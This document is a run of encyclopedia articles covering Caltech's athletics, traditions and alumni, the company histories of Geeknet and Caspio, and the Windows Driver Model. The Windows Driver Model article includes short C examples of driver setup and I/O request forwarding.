Until their win over Occidental College on February 22, 2011, the team had not won a game in SCIAC play since 1985. Ryan Elmquist's free throw with 3.3 seconds left in regulation gave the Beavers the victory. The documentary film Quantum Hoops concerns the events of the Beavers' 2005–06 season.
On January 13, 2007, the Caltech women's basketball team snapped a 50-game losing streak, defeating the Pomona-Pitzer Sagehens 55–53. The women's program, which entered the SCIAC in 2002, garnered their first conference win. On the bench as honorary coach for the evening was Dr. Robert Grubbs, 2005 Nobel laureate in Chemistry. The team went on to beat Whittier College on February 10, for its second SCIAC win, and placed its first member on the All Conference team. The 2006–2007 season is the most successful season in the history of the program.
In 2007, 2008, and 2009, the women's table tennis team (a club team) competed in nationals. The women's Ultimate club team, known as "Snatch", has also been very successful in recent years, ranking 44th of over 200 college teams in the Ultimate Players Association.
On February 2, 2013, the Caltech baseball team ended a 228-game losing streak, the team's first win in nearly 10 years.
The track and field team's home venue is at the South Athletic Field in Tournament Park, the site of the first Rose Bowl Game.
The school also sponsored a football team prior to 1976, which played part of its home schedule at the Rose Bowl, or, as Caltech students put it, "to the largest number of empty seats in the nation".
Performing and visual arts
The Caltech/Occidental College Orchestra is a full seventy-piece orchestra composed of students, faculty, and staff at Caltech and nearby Occidental College. The orchestra gives three pairs of concerts annually, at both Caltech and Occidental College. There are also two Caltech Jazz Bands and a Concert Band, as well as an active chamber music program. For vocal music, Caltech has a mixed-voice Glee Club and the smaller Chamber Singers. The theater program at Caltech is known as TACIT, or Theater Arts at the California Institute of Technology. There are two to three plays organized by TACIT per year, and they were involved in the production of the PHD Movie, released in 2011.
Student life traditions
Annual events
Every Halloween, Dabney House conducts the infamous "Millikan pumpkin-drop experiment" from the top of Millikan Library, the highest point on campus. According to tradition, a claim was once made that the shattering of a pumpkin frozen in liquid nitrogen and dropped from a sufficient height would produce a triboluminescent spark. This yearly event involves a crowd of observers, who try to spot the elusive spark. The title of the event is an oblique reference to the famous Millikan oil-drop experiment, which measured e, the elementary charge.
On Ditch Day, the seniors ditch school, leaving behind elaborately designed tasks and traps at the doors of their rooms to prevent underclassmen from entering. Over the years this has evolved to the point where many seniors spend months designing mechanical, electrical, and software obstacles to confound the underclassmen. Each group of seniors designs a "stack" to be solved by a handful of underclassmen. The faculty have been drawn into the event as well, and cancel all classes on Ditch Day so the underclassmen can participate in what has become a highlight of the academic year.
Another long-standing tradition is the playing of Wagner's "Ride of the Valkyries" at 7:00 each morning during finals week with the largest, loudest speakers available. The playing of that piece is not allowed at any other time (except if one happens to be listening to the entire 14 hours and 5 minutes of The Ring Cycle), and any offender is dragged into the showers to be drenched in cold water fully dressed.
Pranks
Caltech students have been known for their many pranks (also known as "RFs").
The two most famous in recent history are the changing of the Hollywood Sign to read "Caltech", by judiciously covering up certain parts of the letters, and the changing of the scoreboard to read Caltech 38, MIT 9 during the 1984 Rose Bowl Game. But the most famous of all occurred during the 1961 Rose Bowl Game, where Caltech students altered the flip-cards that were raised by the stadium attendees to display "Caltech", and several other "unintended" messages. This event is now referred to as the Great Rose Bowl Hoax.
In recent years, pranking has been officially encouraged by Tom Mannion, Caltech's Assistant VP for Student Affairs and Campus Life. "The grand old days of pranking have gone away at Caltech, and that's what we are trying to bring back," reported the Boston Globe.
In December 2011, Caltech students went to New York and pulled a prank in Manhattan's Greenwich Village. The prank involved making The Cube sculpture look like the Aperture Science Weighted Companion Cube from the video game Portal.
Caltech pranks have been documented in three Legends of Caltech books, the most recent of which was edited by alumni Autumn Looijen '99 and Mason Porter '98 and published in May 2007.
Rivalry with MIT
In 2005, a group of Caltech students pulled a string of pranks during MIT's Campus Preview Weekend for admitted students. These include covering up the word Massachusetts in the "Massachusetts Institute of Technology" engraving on the main building façade with a banner so that it read "That Other Institute of Technology". A group of MIT hackers responded by altering the banner so that the inscription read "The Only Institute of Technology." Caltech students also passed out T-shirts to MIT's incoming freshman class that had MIT written on the front and "...because not everyone can go to Caltech" along with an image of a palm tree on the back.
MIT retaliated in April 2006, when students posing as the Howe & Ser (Howitzer) Moving Company stole the 130-year-old, 1.7-ton Fleming House cannon and moved it over 3,000 miles to their campus in Cambridge, Massachusetts for their 2006 Campus Preview Weekend, repeating a similar prank performed by nearby Harvey Mudd College in 1986. Thirty members of Fleming House traveled to MIT and reclaimed their cannon on April 10, 2006.
On April 13, 2007 (Friday the 13th), a group of students from The California Tech, Caltech's campus newspaper, arrived and distributed fake copies of The Tech, MIT's campus newspaper, while prospective students were visiting for their Campus Preview Weekend. Articles included "MIT Invents the Interweb", "Architects Deem Campus 'Unfortunate'", and "Infinite Corridor Not Actually Infinite".
In December 2009, some Caltech students declared that MIT had been sold and had become the Caltech East campus. A "sold" banner was hung on front of the MIT dome building and a "Welcome to Caltech East: School of the Humanities" banner over the Massachusetts Avenue Entrance. Newspapers and T-shirts were distributed, and door labels and fliers in the infinite corridor were put up in accordance with the "curriculum change."
In September 2010, MIT students attempted to put a TARDIS, the time machine from the BBC's Doctor Who, onto a roof. Caught in mid-act, the students aborted the prank. In January 2011, Caltech students, in conjunction with MIT students, helped put the TARDIS on top of Baxter Hall. Caltech students then moved the TARDIS to UC Berkeley and Stanford.
In April 2014, during MIT's Campus Preview Weekend, a group of Caltech students handed out mugs emblazoned with the MIT logo on the front and the words "The Institute of Technology" on the back. When heated, the mugs turn orange, display a palm tree, and read "Caltech The Hotter Institute of Technology." Identical mugs continue to be sold at the Caltech campus store.
Honor code
Life in the Caltech community is governed by the honor code, which simply states: "No member of the Caltech community shall take unfair advantage of any other member of the Caltech community." This is enforced by a Board of Control, which consists of undergraduate students, and by a similar body at the graduate level, called the Graduate Honor Council.
The honor code aims at promoting an atmosphere of respect and trust that allows Caltech students to enjoy privileges that make for a more relaxed atmosphere. For example, the honor code allows professors to make the majority of exams as take-home, allowing students to take them on their own schedule and in their preferred environment.
Through the late 1990s, the only exception to the honor code, implemented earlier in the decade in response to changes in federal regulations, concerned the sexual harassment policy. Today, there are myriad exceptions to the honor code in the form of new Institute policies such as the fire policy and alcohol policy. Although both policies are presented in the Honor System Handbook given to new members of the Caltech community, some undergraduates regard them as a slight against the honor code and the implicit trust and respect it represents within the community. In recent years, the Student Affairs Office has also taken up pursuing investigations independently of the Board of Control and Conduct Review Committee, an implicit violation of both the honor code and written disciplinary policy that has contributed to further erosion of trust between some parts of the undergraduate community and the administration.
Notable people
Caltech has 40 Nobel laureates to its name: 24 alumni (including 5 Caltech professors who are also alumni: Carl D. Anderson, Linus Pauling, William A. Fowler, Edward B. Lewis, and Kip Thorne) and 16 non-alumni professors. The total number of Nobel Prizes is 41 because Pauling received prizes in both Chemistry and Peace. Eight faculty and alumni have received a Crafoord Prize from the Royal Swedish Academy of Sciences, while 58 have been awarded the U.S. National Medal of Science, and 11 have received the National Medal of Technology. One alumnus, Stanislav Smirnov, won the Fields Medal in 2010. Other distinguished researchers have been affiliated with Caltech as postdoctoral scholars (for example, Barbara McClintock, James D. Watson, Sheldon Glashow and John Gurdon) or visiting professors (for example, Albert Einstein, Stephen Hawking and Edward Witten).
Students
Caltech enrolled 987 undergraduate students and 1,410 graduate students for the 2021–2022 school year. Women made up 45% of the undergraduate and 33% of the graduate student body. The racial demographics of the school substantially differ from those of the nation as a whole.
The four-year graduation rate is 79% and the six-year rate is 92%, which is low compared to most leading U.S. universities, but substantially higher than it was in the 1960s and 1970s. Students majoring in STEM fields traditionally have graduation rates below 70%.
Alumni
There are 22,930 total living alumni in the U.S. and around the world. As of October 2020, 24 alumni and 16 non-alumni faculty have won the Nobel Prize. The Turing Award, the "Nobel Prize of Computer Science", has been awarded to six alumni, and one has won the Fields Medal.
Many alumni have participated in scientific research. Some have concentrated their studies on the very small universe of atoms and molecules. Nobel laureate Carl D. Anderson (BS 1927, PhD 1930) proved the existence of positrons and muons, Nobel laureate Edwin McMillan (BS 1928, MS 1929) synthesized the first transuranium element, Nobel laureate Leo James Rainwater (BS 1939) investigated the non-spherical shapes of atomic nuclei, and Nobel laureate Douglas D. Osheroff (BS 1967) studied the superfluid nature of helium-3. Donald Knuth (PhD 1963), the "father" of the analysis of algorithms, wrote The Art of Computer Programming and created the TeX computer typesetting system, which is commonly used in the scientific community. Bruce Reznick (BS 1973) is a mathematician noted for his contributions to number theory and the combinatorial-algebraic-analytic investigations of polynomials. Narendra Karmarkar (MS 1979) is known for the interior point method, a polynomial algorithm for linear programming known as Karmarkar's algorithm.
Other alumni have turned their gaze to the universe. C. Gordon Fullerton (BS 1957, MS 1958) piloted the third Space Shuttle mission. Astronaut (and later, United States Senator) Harrison Schmitt (BS 1957) was the only geologist ever to have walked on the surface of the Moon. Astronomer Eugene Merle Shoemaker (BS 1947, MS 1948) co-discovered Comet Shoemaker–Levy 9 (a comet which crashed into the planet Jupiter) and was the first person buried on the Moon (his ashes were carried aboard a spacecraft that was deliberately crashed into the lunar surface). Astronomer George O. Abell (BS 1951, MS 1952, PhD 1957) participated in the National Geographic Society–Palomar Sky Survey while a graduate student at Caltech. This work ultimately resulted in the publication of the Abell Catalogue of Clusters of Galaxies, the definitive work in the field.
Undergraduate alumni founded, or co-founded, companies such as LCD manufacturer Varitronix, Hotmail, Compaq, MathWorks (which created Matlab), and database provider Imply, while graduate students founded, or co-founded, companies such as Intel, TRW, and the non-profit educational organization, the Exploratorium.
Arnold Beckman (PhD 1928) invented the pH meter and commercialized it with the founding of Beckman Instruments. His success with that company enabled him to provide seed funding for William Shockley (BS 1932), who had co-invented semiconductor transistors and wanted to commercialize them. Shockley became the founding Director of the Shockley Semiconductor Laboratory division of Beckman Instruments. Shockley had previously worked at Bell Labs, whose first president was another alumnus, Frank Jewett (BS 1898). Because his aging mother lived in Palo Alto, California, Shockley established his laboratory near her in Mountain View, California. Shockley was a co-recipient of the Nobel Prize in physics in 1956, but his aggressive management style and odd personality at the Shockley Lab became unbearable. In late 1957, eight of his researchers resigned and with support from Sherman Fairchild formed Fairchild Semiconductor. Among the "traitorous eight" was Gordon E. Moore (PhD 1954), who later left Fairchild to co-found Intel. Other offspring companies of Fairchild Semiconductor include National Semiconductor and Advanced Micro Devices, which in turn spawned more technology companies in the area. Shockley's decision to use silicon instead of germanium as the semiconductor material, coupled with the abundance of silicon semiconductor related companies in the area, gave rise to the term "Silicon Valley" to describe that geographic region surrounding Palo Alto.
Caltech alumni have also held public office: Mustafa A.G. Abushagur (PhD 1984) was Deputy Prime Minister of Libya and Prime Minister-Elect of Libya, James Fletcher (PhD 1948) was the 4th and 7th Administrator of NASA, Steven Koonin (PhD 1972) was the Undersecretary of Energy for Science, and Regina Dugan (PhD 1993) was the 19th director of DARPA. The 20th director of DARPA, Arati Prabhakar, is also a Caltech alumna (PhD 1984), as is Charles Elachi (PhD 1971), former director of the Jet Propulsion Laboratory. Arvind Virmani is a former Chief Economic Adviser to the Government of India. In 2013, President Obama announced the nomination of France Cordova (PhD 1979) as the director of the National Science Foundation and Ellen Williams (PhD 1982) as the director for ARPA-E.
Faculty and staff
Richard Feynman was among the most well-known physicists associated with Caltech, having published the Feynman Lectures on Physics, an undergraduate physics text, and popular science texts such as Six Easy Pieces for the general audience. The promotion of physics made him a public figure of science, although his Nobel-winning work in quantum electrodynamics was already very established in the scientific community. Murray Gell-Mann, a Nobel-winning physicist, introduced a classification of hadrons and went on to postulate the existence of quarks, which is currently accepted as part of the Standard Model. Long-time Caltech President Robert Andrews Millikan was the first to calculate the charge of the electron with his well-known oil-drop experiment, while Richard Chace Tolman is remembered for his contributions to cosmology and statistical mechanics. 2004 Nobel Prize in Physics winner H. David Politzer is a current professor at Caltech, as is astrophysicist and author Kip Thorne and eminent mathematician Barry Simon. Linus Pauling pioneered quantum chemistry and molecular biology, and went on to discover the nature of the chemical bond in 1939. Seismologist Charles Richter, also an alumnus, developed the magnitude scale that bears his name, the Richter magnitude scale for measuring the power of earthquakes. One of the founders of the geochemistry department, Clair Patterson was the first to accurately determine the age of the Earth via lead:uranium ratio in meteorites. In engineering, Theodore von Kármán made many key advances in aerodynamics, notably his work on supersonic and hypersonic airflow characterization. A repeating pattern of swirling vortices is named after him, the von Kármán vortex street. Participants in von Kármán's GALCIT project included Frank Malina, who helped develop the WAC Corporal, which was the first U.S. rocket to reach the edge of space, Jack Parsons, a pioneer in the development of liquid and solid rocket fuels who designed the first castable composite-based rocket motor, and Qian Xuesen, who was dubbed the "Father of Chinese Rocketry". More recently, Michael Brown, a professor of planetary astronomy, discovered many trans-Neptunian objects, most notably the dwarf planet Eris, which prompted the International Astronomical Union to redefine the term "planet".
David Baltimore, the Robert A. Millikan Professor of Biology, and Alice Huang, Senior Faculty Associate in Biology, served as the presidents of AAAS from 2007 to 2008 and 2010 to 2011, respectively.
33% of the faculty are members of the National Academy of Sciences or Engineering and/or fellows of the American Academy of Arts and Sciences. This is the highest percentage of any faculty in the country with the exception of the graduate institution Rockefeller University.
The average salary for assistant professors at Caltech is $111,300, associate professors $121,300, and full professors $172,800. Caltech faculty are active in applied physics, astronomy and astrophysics, biology, biochemistry, biological engineering, chemical engineering, computer science, geology, mechanical engineering and physics.
Presidents
James Augustin Brown Scherer (1908–1920) (president of Throop College of Technology before the name change)
Robert A. Millikan (1921–1945), experimental physicist, Nobel laureate in physics for 1923 (his official title was "Chairman of the Executive Council")
Lee A. DuBridge (1946–1969), experimental physicist (first to officially hold the title of President)
Harold Brown (1969–1977), physicist and public servant (left Caltech to serve as United States Secretary of Defense in the administration of Jimmy Carter)
Robert F. Christy (1977–1978), astrophysicist (acting president)
Marvin L. Goldberger (1978–1987), theoretical physicist (left to serve as Director of Institute for Advanced Study)
Thomas E. Everhart (1987–1997), experimental physicist
David Baltimore (1997–2006), molecular biologist, Nobel laureate in Physiology or Medicine for 1975
Jean-Lou Chameau (2006–2013), civil engineer and educational administrator (left to serve as president of King Abdullah University of Science and Technology)
Thomas F. Rosenbaum (2014–), condensed matter physicist and administrator
Caltech startups
Over the years, Caltech has actively promoted the commercialization of technologies developed within its walls. Through its Office of Technology Transfer & Corporate Partnerships, scientific breakthroughs have led to the transfer of numerous technologies in a wide variety of fields such as photovoltaics, radio-frequency identification (RFID), semiconductors, hyperspectral imaging, electronic devices, protein design, solid-state amplifiers, and many more. Companies such as Contour Energy Systems, Impinj, Fulcrum Microsystems, Nanosys, Inc., Photon etc., Xencor, and Wavestream Wireless have emerged from Caltech.
In media and popular culture
Caltech has appeared in many works of popular culture, both as itself and in disguised form. On television, it plays a prominent role and is the workplace of all four male lead characters and one female lead character in the sitcom The Big Bang Theory. Caltech is also the inspiration, and frequent film location, for the California Institute of Science in Numb3rs. On film, the Pacific Tech of The War of the Worlds and Real Genius is based on Caltech.
In nonfiction, two 2007 documentaries examine aspects of Caltech: Curious, its researchers, and Quantum Hoops, its men's basketball team.
Given its Los Angeles-area location, the grounds of the Institute are often host to short scenes in movies and television. The Athenaeum dining club appears in the Beverly Hills Cop series, The X-Files, True Romance, and The West Wing.
See also
Engineering education
US-China University Presidents Roundtable
References
External links
Official athletics website
1891 establishments in California
Buildings and structures in Pasadena, California
Education in Pasadena, California
Educational institutions established in 1891
Engineering universities and colleges in California
Private universities and colleges in California
San Gabriel Valley
Schools accredited by the Western Association of Schools and Colleges
Science and technology in Greater Los Angeles
Technological universities in the United States
Universities and colleges in Los Angeles County, California
|
11690283
|
https://en.wikipedia.org/wiki/Geeknet
|
Geeknet
|
Geeknet, Inc. is a Fairfax County, Virginia–based company that is a subsidiary of GameStop. The company was formerly known as VA Research, VA Linux Systems, VA Software, and SourceForge, Inc.
History
VA Research
VA Research was founded in November 1993 by Stanford University graduate student Larry Augustin and James Vera. Augustin was a Stanford colleague of Jerry Yang and David Filo, the founders of Yahoo!. VA Research was one of the first vendors to build and sell personal computer systems installed with the Linux operating system, as an alternative to more expensive Unix workstations that were available at the time. During its initial years of operation, the business was profitable and grew quickly, with over $100 million in sales and a 10% profit margin in 1998. It was the largest vendor of pre-installed Linux computers, with approximately 20% of the Linux hardware market.
In October 1998, the company received investments of $5.4 million from Intel and Sequoia Capital.
In March and April 1999, VA Research purchased Enlightenment Solutions, marketing company Electric Lichen L.L.C., and VA's top competitor, Linux Hardware Solutions. That year, VA Research also won a business-plan competition for the right to operate the linux.com domain. In May 1999, VA created a Linux Labs division, hiring former linux.com domain holder and programmer Fred van Kempen, and programmers Jon "maddog" Hall, Geoff "Mandrake" Harrison, Jeremy Allison, Richard Morrell (who would later create Smoothwall as a project at VA Linux) and San "nettwerk" Mehat. In the summer of 1999, programmers Tony Guntharp, Uriah Welcome, Tim Perdue and Drew Streib began designing and developing SourceForge. SourceForge was released to the public at Comdex on November 17, 1999. VA began porting Linux to the new IA-64 processor architecture in earnest. Intel and Sequoia, along with Silicon Graphics and other investors, added an additional $25 million investment in June 1999.
Initial public offering
The company's largest customers included Akamai Technologies and eToys.
The company changed its name to VA Linux Systems. On December 9, 1999, the company became a public company via an initial public offering. The company raised $132 million, offering shares at $30/share, but the shares opened for trading at $299/share before closing at $239.25/share, or 698% above the IPO price, breaking the record for the largest first-day gain. Larry Augustin, the 38-year-old founder and chief executive officer of the company, became a billionaire on paper, and a 26-year-old web developer at the company said she was worth $10 million on paper. By August 2000, the shares were trading at $40 each and only 24 mutual funds held the stock. On December 8, 2000, one year later, after the bursting of the dot-com bubble, shares traded at $8.49/share. In January 2001, the stock traded at $7.13/share. By December 2002, it was worth just $1.19/share.
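The 698% figure is simply the first-day close measured against the $30 offering price:

\[
\frac{\$239.25 - \$30}{\$30} = \frac{\$209.25}{\$30} \approx 6.98 \approx 698\%
\]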
Acquisition of Andover.net
On February 3, 2000, the company announced that it was acquiring Andover.net for $800 million, a month after it became a public company. This acquisition gave VA Linux popular online media properties such as Slashdot, Andover News Network, Freshmeat, NewsForge (which became a mirror of linux.com in 2007 and has mirrored geeknet.com since 2010), linux.com, ThinkGeek, and a variety of online software development resources. With this acquisition came a stable of writers such as Rob Malda, Robin Miller (Roblimo), Jack Bryar, Rod Amis, Jon Katz, and "CowboyNeal". The acquisition eventually allowed the company to shift its business model from Linux-based product sales to specialty media and software development support.
Japanese partnership
In September 2000, in partnership with Sumitomo Corporation, the company created a Japanese subsidiary, VA Linux Systems Japan KK, to promote Linux systems in Japan.
Sales growth
The company's sales grew to $17.7 million in 1999, up from $5.5 million in fiscal 1998. In fiscal 2000, the company's sales were $120.3 million.
VA Software
By 2001, VA Linux's original equipment and systems business model encountered stiff competition from other hardware vendors, such as Dell, that now offered Linux as a pre-installed operating system.
On June 26, 2001, VA Linux decided that it would leave the systems-hardware business and focus on software development. During the summer of 2001, all 153 of the hardware-focused employees were dismissed as a result of this shift in the company's business model.
On December 6, 2001, the company formally changed its name to VA Software, recognizing that the majority of the business was now software development and specialty news and information services. However, the company's Japanese subsidiary still uses the name "VA Linux Systems Japan K.K."
On January 2, 2002, the company's stock price plunged 42% after an earnings warning.
SourceForge and OSDN
In December 2003, VA Software marketed a proprietary SourceForge Enterprise Edition, rewritten in Java and aimed at supporting offshore and outsourced software development.
By April 2004, the company focused on SourceForge, an online software application, and OSDN, a group of websites catering to people in the information technology and software development industries, which was renamed to Open Source Technology Group (OSTG). At that time, the stock was trading at $1.94/share.
In January 2006, VA Software sold Animation Factory to Jupitermedia Corporation.
On April 24, 2007, the company sold SourceForge Enterprise Edition to CollabNet.
On May 24, 2007, VA Software changed its name to SourceForge Inc. and merged with OSTG.
On January 5, 2009, Scott Kauffman was appointed president and chief executive officer of SourceForge.
Geeknet
In November 2009, SourceForge, Inc. changed its name to Geeknet, Inc.
Geeknet president and chief executive officer Scott Kauffman resigned on August 4, 2010, and was replaced by executive chairman Kenneth Langone; the company also changed its ticker symbol to GKNT.
On August 10, 2010, Jason Baird, the chief operations officer, and Michael Rudolph, the chief marketing officer, resigned, both effective August 31, 2010. Jay Seirmarco, the chief technology officer, also resigned, effective September 30, 2010.
Effective January 31, 2011, Geeknet appointed Matthew C. Blank, former chief executive officer and chairman of Showtime Networks as a member of its board of directors.
Later in 2011, the company renamed its Freshmeat website to Freecode.
In September 2012, Slashdot, SourceForge, and Freecode were sold to Dice Holdings for $20 million, leaving ThinkGeek as the sole property of Geeknet.
On May 26, 2015, it was announced that pop culture-oriented retailer Hot Topic had made an offer to acquire Geeknet for $17.50 per-share, valuing the company at $122 million. However, on May 29, 2015, it was revealed that an unspecified company had made a counter-offer of $20 per-share; Hot Topic was given until June 1, 2015, to exceed this new offer. On June 2, 2015, it was announced that video game retail chain GameStop would acquire Geeknet for $140 million, paying $20 per share. The deal closed on July 17, 2015.
References
External links
VA Linux Systems Japan K.K.
1999 initial public offerings
2015 mergers and acquisitions
Retail companies established in 1993
Companies based in Fairfax County, Virginia
Linux companies
Online publishing companies of the United States
Online retailers of the United States
Software companies based in Virginia
GameStop
1993 establishments in California
Software companies of the United States
|
20402111
|
https://en.wikipedia.org/wiki/Caspio
|
Caspio
|
Caspio is an American software company headquartered in Sunnyvale, California, with offices in Ukraine, Poland and the Philippines. Caspio was founded by Frank Zamani in 2000. The company focuses on database-centric web applications.
History
Caspio was founded by Frank Zamani in 2000. The company initially focused on simplifying custom cloud applications and reducing development time and cost as compared to traditional software development.
Caspio released the first version of its platform, Caspio Bridge, in 2001. In 2014, Caspio released a HIPAA-Compliant Edition of its low-code application development platform.
Caspio also released an EU General Data Protection Regulation (GDPR) Compliance Edition of its low-code application development platform in 2016. Caspio's second European Software Development Center opened in Kraków, Poland in 2017. Caspio also opened data centers in Montreal, Canada and India in 2020.
References
Online databases
Web applications
Cloud applications
Cloud platforms
Web development
Software development
Software development process
Cloud computing
Cloud computing providers
Information technology management
Types of databases
As a service
Software companies based in the San Francisco Bay Area
Software companies of the United States
2000 establishments in the United States
2000 establishments in California
Software companies established in 2000
Companies established in 2000
|
252077
|
https://en.wikipedia.org/wiki/Windows%20Driver%20Model
|
Windows Driver Model
|
In computing, the Windows Driver Model (WDM), also known at one point as the Win32 Driver Model, is a framework for device drivers that was introduced with Windows 98 and Windows 2000 to replace VxD, which was used on older versions of Windows such as Windows 95 and Windows 3.1, as well as the Windows NT Driver Model.
Overview
WDM drivers are layered in a stack and communicate with each other via I/O request packets (IRPs). The Microsoft Windows Driver Model unified the driver models for the Windows 9x and Windows NT product lines by standardizing requirements and reducing the amount of code that needed to be written. WDM drivers will not run on operating systems earlier than Windows 98 or Windows 2000, such as Windows 95 (before the OSR2 update, which brought in parts of the WDM model), Windows NT 4.0 and Windows 3.1. By conforming to WDM, drivers can be binary- and source-compatible across Windows 98, Windows 98 Second Edition, Windows Me, Windows 2000, Windows XP, Windows Server 2003 and Windows Vista (for backwards compatibility) on x86-based computers. WDM drivers are designed to be forward-compatible, so that a WDM driver can run on a version of Windows newer than the one it was initially written for, but the driver then cannot take advantage of any new features introduced with the newer version. WDM is generally not backward-compatible; that is, a WDM driver is not guaranteed to run on any older version of Windows. For example, Windows XP can use a driver written for Windows 2000 but will not make use of any of the new WDM features that were introduced in Windows XP, whereas a driver written for Windows XP may or may not load on Windows 2000.
WDM exists in the intermediary layer of Windows 2000 kernel-mode drivers and was introduced to increase the functionality and ease of writing drivers for Windows. Although WDM was mainly designed to be binary and source compatible between Windows 98 and Windows 2000, this may not always be desired and so specific drivers can be developed for either operating system.
Device kernel-mode drivers
With the Windows Driver Model (WDM) for devices, Microsoft implements an approach to kernel-mode drivers that is unique to Windows operating systems. WDM implements a layered architecture for device drivers: every device of a computer is served by a stack of drivers, and each driver in that stack isolates hardware-independent features from the drivers above and beneath it, so drivers in the stack do not need to interact directly with one another. WDM defines architecture and device procedures for a range of device classes, such as display adapters and network cards; the latter follow the Network Driver Interface Specification (NDIS). In the NDIS architecture the layered network drivers include lower-level drivers that manage the hardware and upper-level drivers that implement network data transport, such as the Transmission Control Protocol (TCP).
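This layering can be illustrated with a minimal sketch of a WDM driver's entry point and AddDevice routine, written against the standard kernel-mode headers; the routine name MyAddDevice and the device-extension layout are illustrative assumptions rather than part of the WDM interface. The AddDevice routine creates a device object, attaches it to the stack anchored by the bus driver's physical device object, and records the device object immediately beneath it so that requests can later be passed down.

#include <wdm.h>

typedef struct _FILTER_EXTENSION {
    PDEVICE_OBJECT LowerDeviceObject;   /* the driver directly beneath this one */
} FILTER_EXTENSION, *PFILTER_EXTENSION;

/* Called by the Plug and Play manager for each device this driver serves. */
NTSTATUS MyAddDevice(PDRIVER_OBJECT DriverObject, PDEVICE_OBJECT PhysicalDeviceObject)
{
    PDEVICE_OBJECT deviceObject;
    PFILTER_EXTENSION extension;
    NTSTATUS status;

    /* Create this driver's device object, reserving space for the extension. */
    status = IoCreateDevice(DriverObject, sizeof(FILTER_EXTENSION), NULL,
                            FILE_DEVICE_UNKNOWN, 0, FALSE, &deviceObject);
    if (!NT_SUCCESS(status)) {
        return status;
    }

    /* Attach on top of the stack anchored by the bus driver's physical device
     * object; the call returns the device object immediately beneath us. */
    extension = (PFILTER_EXTENSION)deviceObject->DeviceExtension;
    extension->LowerDeviceObject =
        IoAttachDeviceToDeviceStack(deviceObject, PhysicalDeviceObject);
    if (extension->LowerDeviceObject == NULL) {
        IoDeleteDevice(deviceObject);
        return STATUS_DEVICE_REMOVED;
    }

    deviceObject->Flags &= ~DO_DEVICE_INITIALIZING;
    return STATUS_SUCCESS;
}

/* Entry point: register the AddDevice callback with the I/O manager. */
NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{
    UNREFERENCED_PARAMETER(RegistryPath);
    DriverObject->DriverExtension->AddDevice = MyAddDevice;
    return STATUS_SUCCESS;
}

The Plug and Play manager calls AddDevice once for each matching device it enumerates, which is how the per-device stack of driver objects described above is assembled.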
While WDM defines three types of device drivers, not all driver stacks for a given device contain all types of device drivers. The three WDM device driver types are:
Bus driver: For every bus on the mainboard there is one bus driver, whose primary responsibility is the identification of all devices connected to that bus and responding to plug and play events. Microsoft provides bus drivers, such as those for PCI, PnPISA, SCSI, USB and FireWire, as part of the operating system.
Function driver: this is the principal driver for a device and it provides the operational interface for a device by handling read and write operations. Function drivers are written by the device vendors, and for their interaction with the hardware they depend on a specific bus driver being present in the Windows operating system.
Filter driver: This driver is optional, and can modify the behaviour of a device, such as input and output requests. These drivers can be implemented as lower-level and upper-level filter drivers.
Object-oriented driver stack
Function drivers and bus drivers are often implemented as driver/minidriver pairs, which in practice are either class/miniclass or port/miniport pairs.
Bus drivers for devices attached to a bus are implemented as class drivers and are hardware-agnostic. They support the operations of a certain type of device. Windows operating systems include a number of class drivers, such as the kbdclass.sys driver for keyboards. Miniclass drivers, on the other hand, are supplied by the vendor of a device and support only device-specific operations for a particular device of a given class.
Port drivers support general input/output (I/O) operations for a peripheral hardware interface. The core functionality of port drivers is mandated by the operating system, and Windows operating systems integrate a variety of port drivers. For example, the i8042prt.sys port driver for the 8042 microcontroller connects PS/2 keyboards to the mainboard peripheral bus. The miniport drivers, like the miniclass drivers, are supplied by the hardware vendors and support only device-specific operations of peripheral hardware that is connected to a port on the mainboard.
Each driver that processes an I/O request for a device has a corresponding object, which is loaded into main memory. A device object is created by the Windows operating system from the associated device class. Device objects contain structures of type DEVICE_OBJECT, which store pointers to their driver. At run time these pointers are used to locate a driver's dispatch routines and member functions. In the WDM driver stack, the filter driver device object, known as the upper filter, receives an I/O request packet (IRP) for a device from the I/O manager. If the upper filter driver cannot serve the request, it locates the object of the driver one step down in the driver stack. The IRP is passed down the driver stack by calling the function IoCallDriver(), and is processed by the function driver device object, also known as the functional device object. The function driver device object in turn may pass the IRP to the lower filter, another filter device object. The IRP may then be passed down to the bus driver, which operates as the physical device object. The bus driver object is at the bottom of the driver stack and interacts with the hardware abstraction layer, which is part of the Windows operating system kernel and allows Windows operating systems to run on a variety of processors, different memory management unit architectures, and a variety of computer systems with different I/O bus architectures. The execution of an IRP is finished when any of the driver objects in the stack returns the request back to the I/O manager, with the result and a status flag.
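A pass-through dispatch routine of the kind described above can be sketched as follows; the names FilterDispatchPassThrough and BusDispatchComplete, and the extension structure, are illustrative assumptions rather than system-defined symbols. The filter reuses the current I/O stack location and hands the IRP to the driver below it with IoCallDriver(), while the driver at the bottom of the stack completes the request back to the I/O manager.

#include <wdm.h>

/* Mirrors the extension sketched earlier: the device object of the driver
 * directly beneath this one was remembered when the stack was built. */
typedef struct _FILTER_EXTENSION {
    PDEVICE_OBJECT LowerDeviceObject;
} FILTER_EXTENSION, *PFILTER_EXTENSION;

/* Dispatch routine of a filter that does not handle the request itself:
 * forward the IRP unchanged to the next driver down the stack. */
NTSTATUS FilterDispatchPassThrough(PDEVICE_OBJECT DeviceObject, PIRP Irp)
{
    PFILTER_EXTENSION extension = (PFILTER_EXTENSION)DeviceObject->DeviceExtension;

    /* Let the lower driver reuse the current I/O stack location, then pass
     * the IRP to it. */
    IoSkipCurrentIrpStackLocation(Irp);
    return IoCallDriver(extension->LowerDeviceObject, Irp);
}

/* At the bottom of the stack the request is finished: the status block is
 * filled in and the IRP is completed back to the I/O manager. */
NTSTATUS BusDispatchComplete(PDEVICE_OBJECT DeviceObject, PIRP Irp)
{
    UNREFERENCED_PARAMETER(DeviceObject);
    Irp->IoStatus.Status = STATUS_SUCCESS;
    Irp->IoStatus.Information = 0;   /* e.g. number of bytes transferred */
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return STATUS_SUCCESS;
}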
Device drivers for different Windows operating systems
The WDM framework was developed by Microsoft to simplify the communication between the operating system and drivers inside the kernel. In Windows operating systems, drivers are implemented as dynamic-link libraries (.DLL files) or as .SYS files. WDM-compliant drivers must follow rules of design, initialisation, plug and play, power management and memory allocation. In practice, WDM driver programmers reuse large pieces of code when building new object-oriented drivers. This means that drivers in the WDM stack may contain residual functionality which is not documented in specifications. Drivers that have passed the Microsoft quality test are digitally signed by Microsoft. The Microsoft Hardware Compatibility Tests and the Driver Development Kit include reliability and stress tests.
